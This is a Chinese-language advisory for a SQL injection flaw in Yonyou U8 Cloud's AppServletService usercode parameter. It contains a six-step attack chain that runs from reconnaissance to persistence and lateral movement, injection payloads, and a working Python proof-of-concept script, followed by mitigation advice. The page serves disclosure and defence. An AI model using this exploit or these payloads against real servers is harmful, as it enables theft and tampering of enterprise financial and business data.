CVE-2025-14185 - 用友U8 Cloud AppServletService SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14185

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Yonyou U8 Cloud 5.0/5.0sp/5.1/5.1sp

漏洞概述

CVE-2025-14185是影响用友U8 Cloud企业管理软件的一个中等严重性SQL注入漏洞。该漏洞存在于用友U8 Cloud 5.0、5.0sp、5.1及5.1sp版本的移动应用服务组件中，具体位于nc/pubitf/erm/mobile/appservice/AppServletService.class文件的某个未知功能函数。攻击者可以通过操纵usercode参数进行SQL注入攻击，从而可能获取数据库中的敏感信息、修改数据或执行恶意操作。该漏洞具有网络可达性，允许远程攻击者无需高权限即可发起攻击，且漏洞利用代码已在互联网公开，增加了被恶意利用的风险。用友厂商在收到漏洞报告后未做出任何回应，导致该漏洞长期处于未修复状态。由于该产品广泛应用于企业财务、供应链和人力资源管理等核心业务系统，漏洞的成功利用可能导致企业敏感商业数据泄露、业务系统瘫痪或被恶意控制，对企业信息安全构成严重威胁。

技术细节

该SQL注入漏洞位于用友U8 Cloud的移动应用服务接口AppServletService组件中。漏洞产生的根本原因在于应用程序对用户输入的usercode参数未进行充分的输入验证和SQL语句参数化处理。当攻击者构造恶意的SQL语句片段作为usercode参数值提交时，后端数据库执行SQL查询时将这些恶意内容作为SQL语句的一部分进行解析和执行。攻击者可以利用UNION SELECT、布尔盲注、时间盲注或错误ベース注入等技术手段，从数据库中提取敏感信息如用户凭证、财务数据、业务记录等。由于该接口设计用于移动端应用调用，攻击者可以通过拦截HTTP请求或直接构造请求包的方式触发漏洞。漏洞的CVSS评分6.3表明其具有网络攻击向量、低复杂度、低权限要求、无需用户交互的特点，但机密性、完整性和可用性影响均为低级别。攻击者成功利用后可进行数据读取、数据篡改或造成服务可用性下降。

攻击链分析

STEP 1

步骤1

信息收集阶段：攻击者通过搜索引擎、Shodan等工具识别互联网暴露的用友U8 Cloud服务，确定目标版本为5.0/5.0sp/5.1/5.1sp

STEP 2

步骤2

漏洞探测：访问nc/pubitf/erm/mobile/appservice/AppServletService接口，使用万能密码或错误语法测试验证SQL注入漏洞存在性

STEP 3

步骤3

构造恶意请求：通过Burp Suite等工具拦截正常请求，修改usercode参数为SQL注入payload（如admin' OR 1=1--或UNION SELECT语句）

STEP 4

步骤4

数据提取：利用UNION注入、布尔盲注或时间盲注技术逐步提取数据库中的敏感信息，包括用户表、账户密码、财务数据等

STEP 5

步骤5

权限提升与持久化：基于获取的数据尝试获取管理员权限，植入后门或修改数据实现持久化控制

STEP 6

步骤6

横向移动：利用获取的凭据或业务数据进一步渗透内网其他系统，扩大攻击成果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14185 SQL Injection PoC for Yonyou U8 Cloud
# Target: nc/pubitf/erm/mobile/appservice/AppServletService.class
# Parameter: usercode

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection via usercode parameter
    Args:
        target_url: Base URL of vulnerable Yonyou U8 Cloud server
        payload: SQL injection payload string
    Returns:
        Response content or error message
    """
    endpoint = f"{target_url}/nc/pubitf/erm/mobile/appservice/AppServletService"
    params = {
        'usercode': payload
    }
    try:
        response = requests.get(endpoint, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Request failed: {str(e)}"

def test_blind_sqli(target_url):
    """
    Test for boolean-based blind SQL injection
    """
    # True condition payload
    true_payload = "admin' AND 1=1--"
    # False condition payload  
    false_payload = "admin' AND 1=2--"
    
    true_resp = exploit_sqli(target_url, true_payload)
    false_resp = exploit_sqli(target_url, false_payload)
    
    if true_resp != false_resp:
        print("[+] Blind SQL injection confirmed!")
        return True
    return False

def extract_db_version(target_url):
    """
    Extract database version using UNION-based injection
    """
    payload = "admin' UNION SELECT @@version--"
    return exploit_sqli(target_url, payload)

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_14185.py <target_url>")
        print("Example: python cve_2025_14185.py http://vulnerable-server:80")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    print(f"[*] Testing CVE-2025-14185 on {target}")
    
    if test_blind_sqli(target):
        print("[*] Database version:", extract_db_version(target))

if __name__ == "__main__":
    main()

影响范围

Yonyou U8 Cloud 5.0

Yonyou U8 Cloud 5.0sp

Yonyou U8 Cloud 5.1

Yonyou U8 Cloud 5.1sp

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）使用Web应用防火墙对nc/pubitf/erm/mobile/appservice/AppServletService接口实施访问控制，限制该接口的网络暴露范围；2）通过Nginx或Apache配置对该路径进行IP白名单限制，仅允许受信任的内部IP访问；3）在应用层代码中临时添加SQL注入防护逻辑，对usercode参数进行严格过滤；4）加强数据库审计日志记录，及时发现异常的SQL执行行为；5）监控用友官方安全公告，关注补丁发布动态并及时更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14185
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14185
3 Details https://www.cvedetails.com/cve/CVE-2025-14185/
4 VulDB https://vuldb.com/cve/CVE-2025-14185
5 Link https://github.com/798xuezhiqian-collab/vuln01
6 Link https://vuldb.com/?ctiid.334605
7 Link https://vuldb.com/?id.334605
8 Link https://vuldb.com/?submit.698601